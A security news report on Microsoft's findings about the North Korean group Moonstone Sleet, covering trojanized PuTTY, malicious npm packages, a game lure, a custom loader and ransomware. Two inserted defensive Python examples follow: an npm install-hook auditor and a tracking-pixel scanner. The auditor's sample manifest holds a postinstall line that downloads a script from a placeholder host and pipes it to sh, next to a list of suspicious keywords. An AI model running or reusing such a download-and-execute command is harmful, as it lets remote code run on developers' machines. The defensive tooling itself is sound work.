Microsoft has named yet another state-aligned threat actor: Moonstone Sleet (formerly Storm-1789), which engages in cyberespionage and ransomware attacks to further goals of the North Korean regime.
“Moonstone Sleet uses tactics, techniques, and procedures (TTPs) also used by other North Korean threat actors over the last several years, highlighting the overlap among these groups,” Microsoft’s threat analysts say.
“When Microsoft first detected Moonstone Sleet activity, the actor demonstrated strong overlaps with Diamond Sleet, extensively reusing code from known Diamond Sleet malware like Comebacker and using well-established Diamond Sleet techniques to gain access to organizations, such as using social media to deliver trojanized software. However, Moonstone Sleet quickly shifted to its own bespoke infrastructure and attacks.”
Moonstone Sleet’s TTPs
Moonstone Sleet attackers:
- Delivered a trojanized version of PuTTY via LinkedIn, Telegram, and developer freelancing platforms to saddle victims with custom malware loaders
- Used malicious npm packages to deliver malicious payloads (including info-stealers)
- Delivered a custom ransomware variant (FakePenny) to a company it previously compromised, and asked for $6.6M in BTC to decrypt files
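One defensive check that follows from the npm item above, as an added example rather than anything from Microsoft's report: npm runs a dependency's preinstall/install/postinstall/prepare scripts on the developer's machine at install time, which is one common way a malicious package executes a payload. The report excerpted here does not say which mechanism Moonstone Sleet's packages used, so treating install hooks as the vector is an assumption; the sample manifests are constructed, and `load_node_modules` is a hypothetical helper for running the same audit against a real `node_modules` tree.

```python
"""Audit npm package manifests for install-time lifecycle scripts.

Added example, not code from Microsoft or from the threat actor. It assumes
(unstated on the page) that a malicious package would rely on npm lifecycle
hooks; the sample manifests below are constructed for illustration.
"""
import json
import os
from typing import Dict, List, Tuple

# Scripts npm executes automatically while installing a dependency.
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Not proof of malice (native builds legitimately use some of these), but a
# hook containing any of them deserves a manual look before install.
SUSPICIOUS_TOKENS = (
    "curl ", "wget ", "powershell", "base64", "eval(",
    "http://", "https://", "node -e",
)


def find_install_hooks(manifests: Dict[str, dict]) -> List[Tuple[str, str, str, bool]]:
    """Return (package, hook, command, suspicious) for every install-time script."""
    findings = []
    for name, manifest in sorted(manifests.items()):
        scripts = manifest.get("scripts") or {}
        for hook in INSTALL_HOOKS:
            cmd = scripts.get(hook)
            if not cmd:
                continue
            suspicious = any(tok in cmd for tok in SUSPICIOUS_TOKENS)
            findings.append((name, hook, cmd, suspicious))
    return findings


def load_node_modules(root: str) -> Dict[str, dict]:
    """Hypothetical helper: collect every package.json under a real node_modules."""
    manifests = {}
    for dirpath, _dirnames, filenames in os.walk(root):
        if "package.json" not in filenames:
            continue
        path = os.path.join(dirpath, "package.json")
        try:
            with open(path, encoding="utf-8") as fh:
                manifests[os.path.relpath(dirpath, root)] = json.load(fh)
        except (OSError, ValueError):
            continue  # unreadable or malformed manifest; skip, don't crash the audit
    return manifests


# Constructed sample manifests: one with no hooks, one benign native build,
# one that downloads and runs a remote script at install time.
SAMPLE_MANIFESTS = {
    "left-pad-clone": {"name": "left-pad-clone", "scripts": {"test": "jest"}},
    "node-gyp-helper": {"name": "node-gyp-helper", "scripts": {"install": "node-gyp rebuild"}},
    "totally-fine-utils": {
        "name": "totally-fine-utils",
        "scripts": {
            "postinstall": "node -e \"require('child_process').exec('curl https://example.invalid/p | sh')\""
        },
    },
}

if __name__ == "__main__":
    for pkg, hook, cmd, flagged in find_install_hooks(SAMPLE_MANIFESTS):
        print(f"{'!!' if flagged else '  '} {pkg}: {hook} -> {cmd}")
```

Run it against a project with `find_install_hooks(load_node_modules("node_modules"))`; anything flagged `!!` should be read before the package is allowed into a build, and `npm install --ignore-scripts` keeps the hooks from running while you look.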
The group also “created” fake software development and IT consulting services companies by setting up legitimate-looking websites, fake employee personas and social media accounts, and used them to reach out to potential targets and solicit work or cooperation.
They used tracking pixels and a dummy unsubscribe page to confirm which targets engaged with the emails.
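The engagement-tracking described above is something mail filtering can surface. The scanner below is an added example (not Microsoft's detection logic or a hunting query from the report): it parses an HTML body, flags remote images that are one pixel or hidden or carry a per-recipient query token, and flags unsubscribe links whose URL embeds a long identifier. The email body is constructed, and the thresholds are heuristics I chose, not values from the page.

```python
"""Flag tracking pixels and tokenised unsubscribe links in inbound HTML mail.

Added example, not code from Microsoft's report. The sample message is
constructed; the heuristics (1px or hidden remote image, query-string token
of 16+ characters on an unsubscribe link) are assumptions, not report values.
"""
from html.parser import HTMLParser
from typing import Dict, List, Tuple
from urllib.parse import parse_qs, urlparse

TOKEN_MIN_LEN = 16  # assumed threshold for "looks like a per-recipient id"


class _Collector(HTMLParser):
    """Collect <img> attributes and (href, anchor text) pairs."""

    def __init__(self) -> None:
        super().__init__()
        self.images: List[Dict[str, str]] = []
        self.links: List[Tuple[str, str]] = []
        self._href = None
        self._text: List[str] = []

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "img":
            self.images.append(a)
        elif tag == "a":
            self._href = a.get("href", "")
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def _is_tiny(value) -> bool:
    """True for width/height attributes of 1px or less; False for %, auto, missing."""
    try:
        return float(str(value).rstrip("px")) <= 1.0
    except ValueError:
        return False


def scan_email_html(html: str) -> List[Tuple[str, str]]:
    """Return (finding, url) pairs for likely beacons and tokenised unsubscribe links."""
    c = _Collector()
    c.feed(html)
    findings = []
    for img in c.images:
        src = img.get("src", "")
        if not src.startswith(("http://", "https://")):
            continue  # cid:/data: images cannot beacon back to the sender
        tiny = _is_tiny(img.get("width")) or _is_tiny(img.get("height"))
        style = img.get("style", "").replace(" ", "").lower()
        hidden = any(s in style for s in ("display:none", "visibility:hidden", "width:1px", "height:1px"))
        tokenised = bool(parse_qs(urlparse(src).query))
        if tiny or hidden or tokenised:
            findings.append(("tracking_pixel", src))
    for href, text in c.links:
        if "unsubscribe" in (text + " " + href).lower():
            q = parse_qs(urlparse(href).query)
            if any(len(v[0]) >= TOKEN_MIN_LEN for v in q.values()):
                findings.append(("tokenised_unsubscribe", href))
    return findings


# Constructed sample: a collaboration pitch with a hidden beacon and a
# per-recipient unsubscribe link, plus a plain logo that should not be flagged.
SAMPLE_EMAIL = """<html><body>
<p>Hi, we would like to collaborate on a blockchain game project.</p>
<p><a href="https://mail.example.invalid/game">Download the game</a></p>
<img src="https://mail.example.invalid/o.gif?rid=a1b2c3d4e5f6a7b8c9d0" width="1" height="1" style="display:none">
<img src="https://mail.example.invalid/logo.png" width="200" height="60">
<p><a href="https://mail.example.invalid/unsub?u=9f8e7d6c5b4a39281706">Unsubscribe</a></p>
</body></html>"""

if __name__ == "__main__":
    for kind, url in scan_email_html(SAMPLE_EMAIL):
        print(f"{kind}: {url}")
```

Marketing mail trips the same heuristics, so this is a triage signal to combine with sender reputation and first-contact status rather than a block rule on its own; the useful part for incident response is the URL it extracts, which can be matched against proxy logs to see which recipients actually fetched the beacon.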
“Moonstone Sleet used a fake company called C.C. Waterfall to contact targets. The email presented the game as a blockchain-related project and offered the target the opportunity to collaborate, with a link to download the [DeTankWar] game included in the body of the message,” Microsoft noted.
Moonstone Sleet emails a link to the DeTankWar game (Source: Microsoft Threat Intelligence)
The linked executable included malicious DLLs that deliver a custom malware loader (YouieLoad), which loads malicious payloads in memory and creates malicious services for network and user discovery and browser data collection.
Finally, the group also tried to get employed as software developers at multiple legitimate companies.
“This activity could be consistent with previous reporting from the United States Department of Justice that North Korea was using highly skilled remote IT workers to generate revenue. On the other hand, this Moonstone Sleet activity may also be another approach to gaining access to organizations,” the analysts pointed out. This type of access could be used to mount software supply chain attacks.
Advice for potential targets
So far, the group has been spotted targeting a drone technology maker, an aircraft parts manufacturer, a defense technology company, and organizations in the software/IT and education sectors.
Microsoft has shared recommendations, indicators of compromise and hunting queries organizations can use to mitigate the threat of a Moonstone Sleet attack or to spot evidence of a successful one.